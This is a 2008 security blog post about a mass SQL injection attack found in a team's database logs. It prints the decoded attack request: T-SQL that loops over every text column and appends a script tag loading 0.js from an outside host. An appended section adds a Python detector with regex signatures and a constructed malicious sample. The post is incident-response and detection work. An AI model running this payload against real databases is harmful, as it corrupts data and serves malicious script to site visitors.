So our team uncovered this SQL attack on January 3, 2008. We promptly supplied the info to the SANS ISC; find their write-up here. My advice to those of you who may face this attack, or a similar variant of something like this, is to follow the code. (Take caution: use a VM or live CD that you can let get destroyed by malicious actions if necessary.)
Our DBAs noticed anomalous activity in certain database transaction logs. Based on the numerous repetitive entries that were present, it was quickly determined to be a bot or poorly managed script attack of some sort. Gather the logs, shut down the system, prepare the CIRT...
I'm going to save the analytical details for another day. Check out the SANS link above if you want to know more about the nuts and bolts of how this one is put together. My point is this: when you face a relatively unknown piece of adversarial code, the only way to defeat it is to understand it. Anti-virus researchers have been at this for years. In this case, just as in the past, the only way to get a reliable damage assessment escalated to an executive is to roll up your sleeves and dissect the alien specimen. This led us to the script in the database, 0.js. The script called a website with a hidden iframe. That's the point at which you know that there is a high probability that this is an XSS attack. The target is the unsuspecting end user...
All this is to say, in this volatile space of information security, we still tend to act too quickly based on the FUD factor (Fear, Uncertainty and Doubt). Take a step back, remember to breathe, and remember that this is all in a day's work for a security geek. Most of all, have fun and learn.
P.S. Here is a decoded POST; it should help to build alert signatures (asterisks and dots to hide the buggies):
P*ST /list***.asp ACTION=FIND&QUERY=B;DECLARE @S NVARCHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''*sc**pt src=h**p://c dot uc8010 dot com/0.js**/scr**t*''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS NVARCHAR(4000));EXEC(@S);**
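As an added example (not code from the original post or the SANS write-up), here is a small Python detector that URL-decodes a request body, expands any CAST(0x... AS NVARCHAR(n)) hex blob into the T-SQL it hides, and checks for the three features visible in the decoded POST above: the hex-cast-then-EXEC wrapper, the cursor that walks sysobjects/syscolumns to update every text column, and the appended script tag. It assumes the original encoded form was a hex blob; the sample bodies, the inner payload fragment and the host attacker.invalid are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the decoded POST above: (1) a hex blob CAST to NVARCHAR
# and handed straight to EXEC, (2) the cursor over sysobjects/syscolumns feeding
# a dynamic UPDATE, (3) the script tag that UPDATE appends to each column.
SIGNATURES = {
    "hex_cast_exec": re.compile(
        r"CAST\(\s*0x[0-9a-f]{16,}\s+AS\s+N?VARCHAR\(\d+\)\s*\)\s*;\s*EXEC\(\s*@", re.I),
    "cursor_mass_update": re.compile(
        r"CURSOR\s+FOR\s+select.*?sysobjects.*?syscolumns.*?update\s*\[", re.I | re.S),
    "script_tag_append": re.compile(r"<script\s+src=", re.I),
}

HEX_CAST = re.compile(r"CAST\(\s*0x([0-9a-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\s*\)", re.I)


def decode_hex_casts(text):
    """Expand CAST(0x... AS NVARCHAR(n)) blobs in place so the hidden T-SQL is
    visible to the signatures. NVARCHAR blobs are UTF-16LE, VARCHAR single-byte."""
    def expand(m):
        hexblob = m.group(1)
        if len(hexblob) % 2:            # not a valid byte string; leave untouched
            return m.group(0)
        codec = "utf-16-le" if m.group(2) else "latin-1"
        return bytes.fromhex(hexblob).decode(codec, errors="replace")
    return HEX_CAST.sub(expand, text)


def inspect_request(body):
    """Return the names of every signature that fires on one form-encoded body.
    Both the URL-decoded text and its hex-expanded form are searched."""
    url_decoded = unquote_plus(body)
    haystack = url_decoded + "\n" + decode_hex_casts(url_decoded)
    return [name for name, rx in SIGNATURES.items() if rx.search(haystack)]


# Constructed sample bodies, not real captures. INNER mirrors the shape of the
# decoded POST above ("..." marks elided parts); the script host is a placeholder.
INNER = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
         "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
         "a.xtype='u' OPEN Table_Cursor ... exec('update ['+@T+'] set ['+@C+']="
         "rtrim(convert(varchar,['+@C+']))+''<script src=http://attacker.invalid/0.js>"
         "</script>''') ... DEALLOCATE Table_Cursor")
MALICIOUS_BODY = ("ACTION=FIND&QUERY=B;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(0x"
                  + INNER.encode("utf-16-le").hex() + "+AS+NVARCHAR(4000));EXEC(@S);--")
BENIGN_BODY = "ACTION=FIND&QUERY=blue+widgets"

if __name__ == "__main__":
    print(inspect_request(MALICIOUS_BODY))  # ['hex_cast_exec', 'cursor_mass_update', 'script_tag_append']
    print(inspect_request(BENIGN_BODY))     # []
```

Run inspect_request over each POST body in the web server or proxy log; any hit on the first two signatures is worth an alert on its own, since legitimate form input has no business casting hex to NVARCHAR or opening a cursor over sysobjects.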
Friday, January 11, 2008